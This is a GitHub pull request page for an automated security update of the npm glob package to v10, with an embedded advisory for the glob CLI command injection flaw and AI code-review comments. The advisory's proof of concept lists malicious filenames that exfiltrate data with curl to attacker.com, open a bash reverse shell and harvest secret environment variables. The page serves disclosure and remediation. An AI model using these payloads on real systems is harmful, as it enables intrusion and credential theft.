Skip to content

fix(deps): update dependency glob to v10 [security]#382

Draft
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-glob-vulnerability
Draft

fix(deps): update dependency glob to v10 [security]#382
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-glob-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Apr 15, 2026
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
glob ^7.1.2^10.0.0 age confidence
glob ^9.3.5^10.0.0 age confidence

glob CLI: Command injection via -c/--cmd executes matches with shell:true

CVE-2025-64756 / GHSA-5j98-mcp5-4vw2

More information

Details

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

  1. User runs glob -c <command> <pattern>
  2. CLI finds files matching the pattern
  3. Matched filenames are collected into an array
  4. Command is executed with matched filenames as arguments using shell: true
  5. Shell interprets metacharacters in filenames as command syntax
  6. Malicious filenames execute arbitrary commands

Affected Component:

  • CLI Only: The vulnerability affects only the command-line interface
  • Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
  • Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

  • Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
  • Any directory where attackers can control filenames (PR branches, archives, user uploads)
  • CI/CD pipelines using glob -c on untrusted content
PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

##### Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

  • The echo command executes normally
  • Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
  • A new file injected_poc is created, proving command execution
  • Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
Impact

Arbitrary Command Execution:

  • Commands execute with full privileges of the user running glob CLI
  • No privilege escalation required - runs as current user
  • Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

  • Malicious PR adds files with crafted names to repository
  • CI pipeline uses glob -c to process files (linting, testing, deployment)
  • Commands execute in CI environment with build secrets and deployment credentials
  • Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

  • Developer clones repository or extracts archive containing malicious filenames
  • Local build scripts use glob -c for file processing
  • Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

  • Services using glob CLI to process uploaded files or external content
  • File uploads with malicious names trigger command execution
  • Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

  • Malicious packages or themes include files with crafted names
  • Build processes using glob CLI automatically process these files
  • Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

  • POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
  • Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
  • Mixed Environments: CI systems often use Linux containers regardless of developer platform
Affected Products
  • Ecosystem: npm
  • Package name: glob
  • Component: CLI only (src/bin.mts)
  • Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
  • Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
  • Patched versions: 11.1.0and 10.5.0

Scope Limitation:

  • Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
  • CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable
Remediation
  • Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
  • If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
  • As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

isaacs/node-glob (glob)

v10.5.0

Compare Source

v10.4.5

Compare Source

v10.4.4

Compare Source

v10.4.3

Compare Source

v10.4.2

Compare Source

v10.4.1

Compare Source

v10.4.0

Compare Source

v10.3.16

Compare Source

v10.3.15

Compare Source

v10.3.14

Compare Source

v10.3.13

Compare Source

v10.3.12

Compare Source

v10.3.11

Compare Source

v10.3.10

Compare Source

v10.3.9

Compare Source

v10.3.8

Compare Source

v10.3.7

Compare Source

v10.3.6

Compare Source

v10.3.5

Compare Source

v10.3.4

Compare Source

v10.3.3

Compare Source

v10.3.2

Compare Source

v10.3.1

Compare Source

v10.3.0

Compare Source

v10.2.7

Compare Source

v10.2.6

Compare Source

v10.2.5

Compare Source

v10.2.4

Compare Source

v10.2.3

Compare Source

v10.2.2

Compare Source

v10.2.1

Compare Source

v10.2.0

Compare Source

v10.1.0

Compare Source

v10.0.0

Compare Source

  • No default exports, only named exports

v9.3.5

Compare Source

v9.3.4

Compare Source

v9.3.3

Compare Source

  • Upgraded minimatch to v8, adding support for any degree of
    nested extglob patterns.

v9.3.2

Compare Source

v9.3.1

Compare Source

v9.3.0

Compare Source

v9.2.1

Compare Source

v9.2.0

Compare Source

v9.1.2

Compare Source

v9.1.1

Compare Source

v9.1.0

Compare Source

v9.0.2

Compare Source

v9.0.1

Compare Source

v9.0.0

Compare Source

v8.1.0

Compare Source

v8.0.3

Compare Source

v8.0.2

Compare Source

v8.0.1

Compare Source

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the renovate label Apr 15, 2026
@coderabbitai
Copy link
Copy Markdown
Contributor

coderabbitai Bot commented Apr 15, 2026
edited
Loading

📝 Walkthrough

Walkthrough

Two glob package entries were updated: the root package.json dependency was bumped from ^9.3.5 to ^10.0.0, and src/test/vscode-notebook-perf/package.json devDependency was bumped from ^7.1.2 to ^10.0.0. No other files or code changes are present.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~8 minutes

🚥 Pre-merge checks | ✅ 6
✅ Passed checks (6 passed)
Check name Status Explanation
Title check ✅ Passed The title accurately summarizes the main change: upgrading the glob dependency to v10 for security reasons, matching the actual dependency updates in both package.json files.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check ✅ Passed Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check ✅ Passed Check skipped because no linked issues were found for this pull request.
Updates Docs ✅ Passed Security patch updating glob dependency to address CVE-2025-64756. Version bumps in package.json with no new functionality.
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

Comment @coderabbitai help to get the list of available commands and usage tips.

@codecov
Copy link
Copy Markdown

codecov Bot commented Apr 15, 2026

⚠️ JUnit XML file not found

The CLI was unable to find any JUnit XML files to upload.
For more help, visit our troubleshooting guide.

coderabbitai[bot]
coderabbitai Bot requested changes Apr 15, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
src/test/vscode-notebook-perf/package.json (1)

29-35: 🛠️ Refactor suggestion | 🟠 Major

Type definitions may be stale.glob v10+ ships its own TypeScript definitions, so @types/glob is no longer needed. Remove @types/glob from devDependencies.

Proposed fix 
 "devDependencies": {
-    "@types/glob": "^5.0.35",
     "@types/mocha": "^9.1.0",
🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@src/test/vscode-notebook-perf/package.json` around lines 29 - 35, Remove the
now-unnecessary "@types/glob" devDependency from package.json (it is listed
alongside other devDependencies like "@types/mocha", "@types/node", "glob" and
"@vscode/test-cli"); delete the "@types/glob" entry, then update your lockfile
by running your package manager install (npm/yarn/pnpm) so the dependency tree
and lockfile are consistent.
🤖 Prompt for all review comments with AI agents 
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@package.json`:
- Line 2710: Update the import and call sites to the new named export: replace
the default import "import glob from 'glob'" with "import { globSync } from
'glob'" and replace all uses of "glob.sync(...)" with direct calls to
"globSync(...)" in the three affected modules (gulpfile.js where glob is used
around the task that reads files, build/webTestReporter.js around the reporter
file-globbing logic, and build/webpack/common.js in the config file-glob usage).
Ensure you only import the named symbol globSync and update every glob.sync
invocation in those files to globSync with identical arguments.

---

Outside diff comments:
In `@src/test/vscode-notebook-perf/package.json`:
- Around line 29-35: Remove the now-unnecessary "@types/glob" devDependency from
package.json (it is listed alongside other devDependencies like "@types/mocha",
"@types/node", "glob" and "@vscode/test-cli"); delete the "@types/glob" entry,
then update your lockfile by running your package manager install
(npm/yarn/pnpm) so the dependency tree and lockfile are consistent.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: ASSERTIVE

Plan: Pro

Run ID: 0d2828a5-22fd-4510-a910-8f9254cfde78

📥 Commits

Reviewing files that changed from the base of the PR and between 9ca0182 and db7e18e.

⛔ Files ignored due to path filters (2)
  • package-lock.json is excluded by !**/package-lock.json
  • src/test/vscode-notebook-perf/package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (2)
  • package.json
  • src/test/vscode-notebook-perf/package.json

@renovate renovate Bot changed the title fix(deps): update dependency glob to v10 [security] fix(deps): update dependency glob to v10 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot deleted the renovate/npm-glob-vulnerability branch April 27, 2026 17:38
@renovate renovate Bot changed the title fix(deps): update dependency glob to v10 [security] - autoclosed fix(deps): update dependency glob to v10 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-glob-vulnerability branch 2 times, most recently from db7e18e to 4360ae5 Compare April 27, 2026 21:29
coderabbitai[bot]
coderabbitai Bot requested changes Apr 27, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents 
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@package.json`:
- Line 2710: Update the declared dependency range for glob to require the safe
minimum by changing the version string from "^10.0.0" to "^10.5.0" (the
dependency key "glob" in package.json), then regenerate the lockfile (run your
package manager install) so the lockfile pins a non-vulnerable 10.5.x+ release
and run CI/tests to verify nothing breaks.

In `@src/test/vscode-notebook-perf/package.json`:
- Line 35: Update the glob dependency version constraint in package.json from
"^10.0.0" to "^10.5.0" to exclude vulnerable 10.2.0–10.4.x releases; after
changing the "glob" entry, regenerate the lockfile (npm install / yarn install),
run the test suite and dependency audit (npm audit or yarn audit) to ensure no
regressions, and commit the updated lockfile alongside the package.json change.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: ASSERTIVE

Plan: Pro

Run ID: 8064bc41-af03-48ca-93dc-59a02d0fa548

📥 Commits

Reviewing files that changed from the base of the PR and between db7e18e and 4360ae5.

⛔ Files ignored due to path filters (2)
  • package-lock.json is excluded by !**/package-lock.json
  • src/test/vscode-notebook-perf/package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (2)
  • package.json
  • src/test/vscode-notebook-perf/package.json

Comment thread package.json
"format-util": "^1.0.5",
"fs-extra": "^4.0.3",
"glob": "^9.3.5",
"glob": "^10.0.0",
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot Apr 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "== Declared glob ranges in changed manifests =="
rg -n '"glob"\s*:\s*"\^10\.[0-9]+\.[0-9]+"' package.json src/test/vscode-notebook-perf/package.json

echo
echo "== Resolved glob versions from lockfiles (if present) =="
for lock in package-lock.json npm-shrinkwrap.json pnpm-lock.yaml yarn.lock; do
  if [ -f "$lock" ]; then
    echo "--- $lock ---"
    rg -n 'glob|10\.[0-9]+\.[0-9]+' "$lock" | head -n 120
  fi
done

Repository: deepnote/vscode-deepnote

Length of output: 6897

🏁 Script executed:

#!/bin/bash
# Find the main glob dependency entry and its resolved version
rg -A 5 'node_modules/glob"\s*:' package-lock.json | head -20

Repository: deepnote/vscode-deepnote

Length of output: 1274

🌐 Web query:

CVE-2025-64756 GHSA-5j98-mcp5-4vw2 glob security vulnerability

💡 Result:

CVE-2025-64756 (GHSA-5j98-mcp5-4vw2) is a high-severity command injection vulnerability in the CLI of the npm glob package, affecting versions >=10.2.0 <10.5.0 and >=11.0.0 <11.1.0. It allows arbitrary command execution when using the -c/--cmd option on files with malicious shell metacharacters in names, as filenames are passed to a shell with shell: true. The core library API (glob, globSync) is unaffected. Patched in 10.5.0 and 11.1.0. CVSS 3.1: 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H). Published November 17, 2025.

Citations:

🏁 Script executed:

#!/bin/bash
# Find the root-level glob node_modules entry
rg -B 2 -A 10 '"node_modules/glob"' package-lock.json | grep -A 10 '"node_modules/glob":' | head -20

Repository: deepnote/vscode-deepnote

Length of output: 850

Tighten glob minimum to prevent vulnerable range.

The declared range "^10.0.0" permits versions 10.2.0–10.4.x, which are vulnerable to CVE-2025-64756 (CLI command injection via --cmd flag). The lockfile currently resolves to 10.5.0 (safe), but the loose range could reintroduce vulnerability on lockfile regeneration. Update to "^10.5.0" to enforce the safe minimum.

Suggested diff 
-        "glob": "^10.0.0",
+        "glob": "^10.5.0",
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
"glob": "^10.0.0",
"glob": "^10.5.0",
🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@package.json` at line 2710, Update the declared dependency range for glob to
require the safe minimum by changing the version string from "^10.0.0" to
"^10.5.0" (the dependency key "glob" in package.json), then regenerate the
lockfile (run your package manager install) so the lockfile pins a
non-vulnerable 10.5.x+ release and run CI/tests to verify nothing breaks.

Comment thread src/test/vscode-notebook-perf/package.json
"@vscode/test-cli": "^0.0.8",
"@vscode/test-electron": "^2.5.2",
"glob": "^7.1.2",
"glob": "^10.0.0",
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot Apr 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# Find the root package.json and other package.json files to understand the context
find . -name "package.json" -type f | head -20

Repository: deepnote/vscode-deepnote

Length of output: 181

🏁 Script executed:

# Check the root package.json for glob dependency
cat package.json | grep -A 2 -B 2 '"glob"'

Repository: deepnote/vscode-deepnote

Length of output: 218

🏁 Script executed:

# View the specific test package.json file mentioned
cat -n src/test/vscode-notebook-perf/package.json | grep -A 2 -B 2 "glob"

Repository: deepnote/vscode-deepnote

Length of output: 423

🌐 Web query:

glob npm package security vulnerability version 10.0 10.2 10.4 10.5

💡 Result:

The npm package "glob" has a critical command injection vulnerability (CVE-2025-64756, GHSA-5j98-mcp5-4vw2) in its CLI tool when using the -c/--cmd option. This affects versions >=10.2.0 <10.5.0 (including 10.2.x, 10.4.x) and >=11.0.0 <11.1.0. Version 10.0.x is not affected as the vulnerable CLI feature was introduced in 10.2.0. Version 10.5.0 includes the backported fix. Vulnerability details: Matched filenames are passed to a shell with shell: true, allowing shell metacharacters in untrusted filenames (e.g., $(command)) to execute arbitrary code with user privileges. Only CLI usage is affected; the library API (glob, globSync) is safe. Fix: Upgrade to glob@10.5.0 or later (e.g., 11.1.0, 12.0.0+). New safe options: --cmd-arg/-g for positional args, --shell (deprecated, unsafe if paths untrusted). As of 2026-04-27, latest version is 13.0.6 (no known vulnerabilities).

Citations:

🌐 Web query:

glob npm CVE vulnerability 10.5.0 patch release

💡 Result:

The npm glob package released version 10.5.0 as a patch for CVE-2025-64756, a critical command injection vulnerability in the glob CLI tool. The vulnerability affects the -c/--cmd option, where matched filenames are passed to a shell with shell: true, allowing arbitrary command execution via malicious filenames containing shell metacharacters. Affected versions are approximately >=10.2.0 <10.5.0 and >=11.0.0 <11.1.0 (minor variations in reports, e.g., some cite >=10.3.7). The issue is specific to CLI usage and does not affect the library API. Version 10.5.0 backports the fix from the main branch, adding safer options like --cmd-arg/-g and --shell (deprecated). Update via npm install glob@10.5.0 or higher.

Citations:

Upgrade to ^10.5.0 to exclude glob CLI vulnerability CVE-2025-64756.

Versions 10.2.0–10.4.x have a critical command injection vulnerability in the -c/--cmd CLI option. The ^10.0.0 constraint allows these vulnerable versions if lockfile regeneration occurs. Update to ^10.5.0.

Suggested diff 
-    "glob": "^10.0.0",
+    "glob": "^10.5.0",
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
"glob": "^10.0.0",
"glob": "^10.5.0",
🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@src/test/vscode-notebook-perf/package.json` at line 35, Update the glob
dependency version constraint in package.json from "^10.0.0" to "^10.5.0" to
exclude vulnerable 10.2.0–10.4.x releases; after changing the "glob" entry,
regenerate the lockfile (npm install / yarn install), run the test suite and
dependency audit (npm audit or yarn audit) to ensure no regressions, and commit
the updated lockfile alongside the package.json change.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@coderabbitai coderabbitai[bot] coderabbitai[bot] requested changes

Requested changes must be addressed to merge this pull request.

Assignees

No one assigned

Labels

renovate

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants